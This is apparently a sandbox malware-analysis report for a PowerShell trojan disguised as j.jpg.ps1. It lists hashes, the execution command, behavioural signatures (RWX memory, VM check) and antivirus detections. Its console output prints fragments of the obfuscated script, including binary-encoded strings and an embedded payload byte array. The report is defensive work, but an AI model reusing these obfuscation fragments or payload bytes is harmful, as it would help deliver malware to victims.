Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Dec. 20, 2022, 2:29 p.m.	Dec. 20, 2022, 2:31 p.m.

Size	1.1MB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`97817d0d04e4a937009187a101a1962d`
SHA256	`a5e5d0e40d65bf0be762030e36e441be634643c4e08bc44ef03da0de987a39bd`
CRC32	`2B225314`
ssdeep	`24576:CaU+SeyGp9Izbk7AVbnE+K9Ky/HON4oWVRHblNPb9E90Vkhf/7fqRS8LUKbw5BGh:D`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\j.jpg.ps1
3032

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Command line console output was observed (50 out of 14782 events)

Time & API	Arguments	Status	Return
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: The term 'P' is not recognized as the name of a cmdlet, function, script file, console_handle: 0x00000023	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: or operable program. Check the spelling of the name, or if a path was included, console_handle: 0x0000002f	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: At C:\Users\test22\AppData\Local\Temp\j.jpg.ps1:1 char:5685 console_handle: 0x00000047	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: + $ydWM=('011\|110,01110101,01101110,011\|011,011101\|,01101\|1,01101111,01101110,\| console_handle: 0x00000053	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: \|1\|\|0,\|1\|\|0,\|1\|\|0,\|1\|\|0,01111101,\|\|1101,\|\|1010,01111101'.replace('\|','00'))\|P < console_handle: 0x000003a7	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: <<< \| %{ [System.Text.encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2 console_handle: 0x000003b3	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: )) };P([system.String]::Join('', $ydWM)) console_handle: 0x000003bf	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: + CategoryInfo : ObjectNotFound: (P:String) [], CommandNotFoundEx console_handle: 0x000003cb	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: ception console_handle: 0x000003d7	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x000003e3	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: The term 'P' is not recognized as the name of a cmdlet, function, script file, console_handle: 0x00000403	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: or operable program. Check the spelling of the name, or if a path was included, console_handle: 0x0000040f	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: verify that the path is correct and try again. console_handle: 0x0000041b	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: At C:\Users\test22\AppData\Local\Temp\j.jpg.ps1:1 char:5766 console_handle: 0x00000427	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: + $ydWM=('011\|110,01110101,01101110,011\|011,011101\|,01101\|1,01101111,01101110,\| console_handle: 0x00000433	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: \|1\|\|0,\|1\|\|0,\|1\|\|0,\|1\|\|0,01111101,\|\|1101,\|\|1010,01111101'.replace('\|','00'))\|P \| console_handle: 0x00000787	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: %{ [System.Text.encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };P console_handle: 0x00000793	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: <<<< ([system.String]::Join('', $ydWM)) console_handle: 0x0000079f	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: + CategoryInfo : ObjectNotFound: (P:String) [], CommandNotFoundEx console_handle: 0x000007ab	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: ception console_handle: 0x000007b7	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x000007c3	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: The term 'P' is not recognized as the name of a cmdlet, function, script file, console_handle: 0x0000001b	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: or operable program. Check the spelling of the name, or if a path was included, console_handle: 0x00000027	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: verify that the path is correct and try again. console_handle: 0x00000033	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: At C:\Users\test22\AppData\Local\Temp\j.jpg.ps1:4 char:751326 console_handle: 0x0000003f	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: + [Byte[]]$y74gh00rffd=('T>1F,T>8B,T>08,T>00,T>00,T>00,T>00,T>00,T>04,T>00,T>EC console_handle: 0x0000004b	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: ,T>7C,T>79,T>3C,T>D4,T>DF,T>F7,T>FF,T>9D,T>CD,T>58,T>C6,T>30,T>A3,T>A2,T>A2,T>5 console_handle: 0x00000057	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: 0,T>44,T>21,T>7B,T>94,T>16,T>6B,T>29,T>4A,T>68,T>57,T>1A,T>4C,T>9A,T>C2,T>68,T> console_handle: 0x00000063	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: 0C,T>52,T>11,T>15,T>2A,T>ED,T>2B,T>AD,T>12,T>45,T>8B,T>92,T>44,T>BD,T>53,T>2A,T console_handle: 0x0000006f	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: >29,T>51,T>D1,T>9E,T>AD,T>7D,T>93,T>4A,T>48,T>B4,T>FE,T>CE,T>BD,T>33,T>98,T>DE, console_handle: 0x0000007b	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: T>9F,T>F7,T>E7,T>FB,T>FD,T>3D,T>BE,T>FE,T>7D,T>4F,T>DD,T>F3,T>3A,T>E7,T>DE,T>73 console_handle: 0x00000087	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: ,T>9F,T>F7,T>DC,T>7B,T>CF,T>39,T>F7,T>BE,T>4C,T>71,T>9F,T>B9,T>09,T>D1,T>10,T>4 console_handle: 0x00000093	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: 2,T>74,T>28,T>BF,T>7F,T>23,T>54,T>80,T>24,T>9F,T>31,T>E8,T>7F,T>FF,T>C4,T>42,T> console_handle: 0x0000009f	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: 61,T>F7,T>3F,T>C7,T>46,T>A7,T>15,T>6E,T>EA,T>14,T>50,T>DC,T>6E,T>EA,T>78,T>CF,T console_handle: 0x000000ab	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: >17,T>84,T>69,T>87,T>8A,T>84,T>81,T>22,T>5E,T>B0,T>B6,T>3F,T>2F,T>24,T>44,T>28, console_handle: 0x000000b7	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: T>D6,T>F6,T>E3,T>6B,T>8B,T>C2,T>43,T>B4,T>05,T>21,T>DA,T>4E,T>93,T>BC,T>B4,T>83 console_handle: 0x000000c3	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: ,T>85,T>01,T>7C,T>13,T>65,T>65,T>C5,T>81,T>52,T>0C,T>0F,T>67,T>84,T>DC,T>28,T>3 console_handle: 0x000000cf	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: 4,T>34,T>7E,T>FC,T>0E,T>FF,T>0E,T>DC,T>A7,T>88,T>AA,T>A3,T>44,T>91,T>47,T>28,T> console_handle: 0x000000db	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: 81,T>8A,T>D0,T>5A,T>2A,T>A9,T>53,T>CC,T>80,T>A7,T>36,T>6E,T>A4,T>4A,T>AC,T>C3,T console_handle: 0x000000e7	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: >3C,T>55,T>62,T>37,T>42,T>5D,T>4F,T>84,T>67,T>43,T>ED,T>E0,T>C6,T>C4,T>23,T>A4, console_handle: 0x000000f3	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: T>4A,T>FE,T>76,T>3D,T>3B,T>1F,T>E4,T>73,T>32,T>9D,T>8A,T>A6,T>61,T>A6,T>88,T>8A console_handle: 0x000000ff	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: ,T>9C,T>68,T>FF,T>30,T>49,T>18,T>8F,T>05,T>0F,T>53,T>18,T>5F,T>F3,T>FF,T>63,T>4 console_handle: 0x0000010b	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: D,T>3A,T>3F,T>60,T>9F,T>BC,T>8C,T>28,T>0F,T>F2,T>38,T>19,T>D9,T>44,T>CC,T>5F,T> console_handle: 0x00000117	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: 2C,T>86,T>E7,T>CB,T>78,T>E9,T>BC,T>F0,T>5C,T>A9,T>FF,T>01,T>31,T>D7,T>44,T>14,T console_handle: 0x00000123	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: >26,T>C2,T>0B,T>43,T>6C,T>2B,T>92,T>4E,T>78,T>F5,T>9F,T>8A,T>63,T>E0,T>AF,T>89, console_handle: 0x0000012f	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: T>88,T>1F,T>24,T>04,T>45,T>96,T>D4,T>66,T>82,T>B5,T>EE,T>3F,T>F4,T>1C,T>FE,T>6E console_handle: 0x0000013b	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: ,T>66,T>43,T>BA,T>44,T>07,T>DB,T>46,T>45,T>0C,T>D4,T>36,T>18,T>F8,T>51,T>08,T>5 console_handle: 0x00000147	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: 1,T>A4,T>ED,T>4E,T>EB,T>11,T>0A,T>52,T>A7,T>FE,T>BD,T>DB,T>7F,T>FD,T>4C,T>35,T> console_handle: 0x00000153	1	1
WriteConsoleW Dec. 20, 2022, 2:29 p.m.	buffer: B0,T>46,T>48,T>CE,T>60,T>18,T>26,T>7D,T>30,T>E9,T>0B,T>04,T>30,T>D5,T>4C,T>E5,T console_handle: 0x0000015f	1	1

Uses Windows APIs to generate a cryptographic key (6 events)

Time & API	Arguments	Status	Return
CryptExportKey Dec. 20, 2022, 2:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x065d10e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2022, 2:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x065d10e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2022, 2:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x065d10e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2022, 2:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x065d10e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2022, 2:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x065d10e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 20, 2022, 2:29 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x065d10e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Dec. 20, 2022, 2:29 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (12 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Dec. 20, 2022, 2:29 p.m.	process_identifier: 3032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 20, 2022, 2:29 p.m.	process_identifier: 3032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0270f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 20, 2022, 2:29 p.m.	process_identifier: 3032 region_size: 262144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05690000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 20, 2022, 2:29 p.m.	process_identifier: 3032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05690000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 20, 2022, 2:29 p.m.	process_identifier: 3032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05691000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 20, 2022, 2:29 p.m.	process_identifier: 3032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05692000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 20, 2022, 2:29 p.m.	process_identifier: 3032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05693000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 20, 2022, 2:29 p.m.	process_identifier: 3032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05694000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 20, 2022, 2:29 p.m.	process_identifier: 3032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02689000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 20, 2022, 2:29 p.m.	process_identifier: 3032 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06280000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 20, 2022, 2:29 p.m.	process_identifier: 3032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06282000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 20, 2022, 2:29 p.m.	process_identifier: 3032 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06283000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

File has been identified by 10 AntiVirus engines on VirusTotal as malicious (10 events)

MicroWorld-eScan	Trojan.GenericKD.64378838
FireEye	Trojan.GenericKD.64378838
Cyren	PSH/Agent.HA
Kaspersky	HEUR:Trojan.PowerShell.Kryptik.gen
BitDefender	Trojan.GenericKD.64378838
Ad-Aware	Trojan.GenericKD.64378838
Emsisoft	Trojan.GenericKD.64378838 (B)
MAX	malware (ai score=84)
GData	Trojan.GenericKD.64378838
Google	Detected

j.jpg.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All